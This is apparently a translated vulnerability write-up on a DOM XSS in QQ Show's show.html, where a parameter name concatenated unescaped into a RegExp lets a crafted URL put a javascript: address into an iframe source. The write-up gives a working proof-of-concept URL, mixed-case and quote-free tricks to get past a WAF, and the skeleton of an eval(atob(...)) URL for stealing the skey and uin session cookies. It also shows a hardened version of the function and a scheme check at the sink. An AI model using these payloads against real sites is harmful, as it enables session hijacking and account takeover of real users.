DOM XSS mining and analysis of a QQ business main site
Attackers can steal skey and uin in all browsers without being blocked.
While mining for Flash XSS, we accidentally discovered such a URL during decompilation:
show.qq.com is the main site of the QQ Show (qqxiu) business.
Looking at show.html, we find the following code:
var aNUrl = {
    "M": "http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html",
    "T": "http://imgcache.qq.com/qqshow_v3/htdocs/inc/header.html",
    "L": "http://imgcache.qq.com/qqshow_v3/htdocs/inc/sidebar.html"
};
var sUrl = QSFL.excore.getURLParam("MUrl").replace(/http:\/\/show.qq.com/, "http://imgcache.qq.com/qqshow_v3/htdocs");
(sUrl && CheckUrlCredit4Frames(sUrl)) && (aNUrl["M"] = Rel2Abs(sUrl));
var sUrl = QSFL.excore.getURLParam("LUrl");
(sUrl && CheckUrlCredit4Frames(sUrl)) && (aNUrl["L"] = Rel2Abs(sUrl));
var sUrl = QSFL.excore.getURLParam("TUrl");
(sUrl && CheckUrlCredit4Frames(sUrl)) && (aNUrl["T"] = Rel2Abs(sUrl));
......
var uPrm = window.location.href.split("?"); // obtain uPrm from location.href
var _Prm = new QSFL.excore.param(uPrm[1] || "", "&", "="); // parse the GET parameters
for (var xName in _Prm) {
    // xName is the key, _Prm[xName] is the value; every parameter except the three
    // whitelisted ones is copied verbatim into all three frame URLs
    if (typeof(_Prm[xName]) == "string" && xName != "MUrl" && xName != "LUrl" && xName != "TUrl") {
        aNUrl["M"] = QSFL.excore.setURLParam(aNUrl["M"], xName, _Prm[xName]);
        aNUrl["L"] = QSFL.excore.setURLParam(aNUrl["L"], xName, _Prm[xName]);
        aNUrl["T"] = QSFL.excore.setURLParam(aNUrl["T"], xName, _Prm[xName]);
    }
}
......
QSFL.$("headerFrame").src = aNUrl["T"];
QSFL.$("sideFrame").src = aNUrl["L"];
QSFL.$("mainFrame").src = aNUrl["M"];
The last three statements above are obvious XSS candidates. QSFL.$("headerFrame") is an iframe object, and its src attribute accepts the javascript: protocol, that is, <iframe src="javascript:alert(1)">. Therefore, as long as the beginning of aNUrl["T"] can be controlled, a DOM XSS requiring no user interaction can be created.
To control aNUrl["T"], look at the QSFL.excore.setURLParam function. Its first parameter is a preset value.
Here is QSFL.excore.setURLParam:
QSFL.excore.setURLParam = function(sUrl, sName, sValue) {
    sUrl = sUrl.toString();
    sName = sName.toString();
    sValue = sValue.toString().escUrl();
    var r = new RegExp("(^|\\W)" + sName + "=[^&]*", "g");
    var vUrl = sUrl.split("#");
    vUrl[0] = (vUrl[0].match(r))
        ? vUrl[0].replace(r, "$1" + sName + "=" + sValue)
        : vUrl[0] + (vUrl[0].indexOf("?") == -1 ? "?" : "&") + sName + "=" + sValue;
    return vUrl.join("#");
};
First, the line of thought. Of this function's three parameters we cannot control sUrl, but sName and sValue can be controlled; they just cannot contain & or =, since those are the parameter separators.
The key is the ternary operator ?:. If the branch vUrl[0].replace(r, "$1" + sName + "=" + sValue) runs, then because we control sName we control the first half of the URL; if instead vUrl[0] + (vUrl[0].indexOf("?") == -1 ? "?" : "&") + sName + "=" + sValue runs, vUrl[0] is sUrl, whose first half we cannot control, so that branch is useless to us.
So let's see how to make this ternary operator take the first branch. Look at the regular expression RegExp("(^|\\W)" + sName + "=[^&]*", "g"): sName is concatenated straight into the pattern.
We only need this regular expression to match vUrl[0]. How?
Let sName contain the alternation character "|", that is, "|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|". The whole regex then becomes "(^|\W)|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=[^&]*", whose middle alternative is the literal main.html URL, so it certainly matches http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html.
We add javascript:alert(1)// in front of the sName, and the final returned URL is javascript:alert(1)//|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=1 (the "$1" in the replacement is empty, because the first group did not take part in the match). Such a URL placed in the src attribute of the iframe creates an XSS.
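The following is an added example, not code from show.qq.com or from the QSFL library. It re-implements the setURLParam logic shown above as a stand-alone function, puts a hardened version beside it that escapes sName before building the RegExp and URL-encodes it before writing it back, and models the iframe src assignment from the first listing with a scheme check. The names setURLParamVulnerable, setURLParamSafe, escapeRegExp, assignFrameSrc and demo are assumptions of this example, and encodeURIComponent stands in for the page's String.prototype.escUrl.

```javascript
// Added example (not show.qq.com's code): the setURLParam pattern from the page
// next to a hardened version, to show why concatenating a caller-controlled
// parameter name into a RegExp lets that caller decide what the function returns.
// Assumption: encodeURIComponent replaces the page's .escUrl() helper.

// Vulnerable version, as on the page: sName goes into the regex unescaped.
function setURLParamVulnerable(sUrl, sName, sValue) {
  sUrl = sUrl.toString();
  sName = sName.toString();
  sValue = encodeURIComponent(sValue.toString()); // stands in for .escUrl()
  var r = new RegExp("(^|\\W)" + sName + "=[^&]*", "g");
  var vUrl = sUrl.split("#");
  vUrl[0] = vUrl[0].match(r)
    ? vUrl[0].replace(r, "$1" + sName + "=" + sValue)
    : vUrl[0] + (vUrl[0].indexOf("?") == -1 ? "?" : "&") + sName + "=" + sValue;
  return vUrl.join("#");
}

// Escape every regex metacharacter so a parameter name is matched literally.
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Hardened version: the name is URL-encoded before it is written back (so it is a
// plain query token) and regex-escaped before it enters the pattern (so "|", "(" or
// "." cannot widen the match to the whole base URL).
function setURLParamSafe(sUrl, sName, sValue) {
  sUrl = sUrl.toString();
  var name = encodeURIComponent(sName.toString());
  var value = encodeURIComponent(sValue.toString());
  var r = new RegExp("(^|\\W)" + escapeRegExp(name) + "=[^&]*", "g");
  var vUrl = sUrl.split("#");
  vUrl[0] = vUrl[0].match(r)
    ? vUrl[0].replace(r, "$1" + name + "=" + value)
    : vUrl[0] + (vUrl[0].indexOf("?") == -1 ? "?" : "&") + name + "=" + value;
  return vUrl.join("#");
}

// Defence in depth at the sink: only http(s) URLs may reach an iframe's src.
// Returns the URL that would be assigned, or null when it is rejected.
function assignFrameSrc(url) {
  if (!/^https?:\/\//i.test(url.trim())) {
    return null;
  }
  return url;
}

var BASE = "http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html";
// The parameter name from the page's POC: the "|" alternation makes the pattern
// match the whole base URL, so the replacement starts with the chosen prefix.
var POC_NAME = "JavAScripT:alert(1)//|" + BASE + "|";

// Collects the results of both versions on the POC name and on ordinary input.
function demo() {
  var vulnerable = setURLParamVulnerable(BASE, POC_NAME, "1");
  var safe = setURLParamSafe(BASE, POC_NAME, "1");
  return {
    vulnerable: vulnerable,                                   // starts with JavAScripT:
    safe: safe,                                               // still starts with http://imgcache...
    benign: setURLParamSafe(BASE, "tab", "gift"),             // normal append still works
    updated: setURLParamSafe(BASE + "?tab=gift", "tab", "shop"), // normal replace still works
    sinkVulnerable: assignFrameSrc(vulnerable),               // null: rejected at the sink
    sinkSafe: assignFrameSrc(safe)                            // accepted
  };
}
```

Two fixes are shown on purpose. Escaping and encoding the parameter name removes the root cause: the regex can no longer match anything but a literal "name=" token, so the returned string always begins with the preset URL. The scheme check at the sink is independent of that and catches any other path by which a javascript: URL could reach an iframe src; a Content Security Policy that disallows inline script would add a third layer on top of both.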
In fact, I found that the server-side WAF filters some keywords, such as javascript: and the double quote. javascript: can be written with mixed case, and quotation marks are not needed at all: we can replace a quoted string with a regex literal and take its .source.
Here is a POC:
http://show.qq.com/show.html?JavAScripT:alert(1)//|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=1
The pop-up window appears:
Writing an EXP for cookie stealing:
http://show.qq.com/show.html?JavAScripT:eval(atob(/examples/.source))//|http://imgcache.qq.com/qqshow_v3/htdocs/inc/main.html|=1
This runs in Chrome.
Testing confirms that skey and uin can be stolen; with these two, an attacker can log in to another person's QQ space and do a great deal of harm.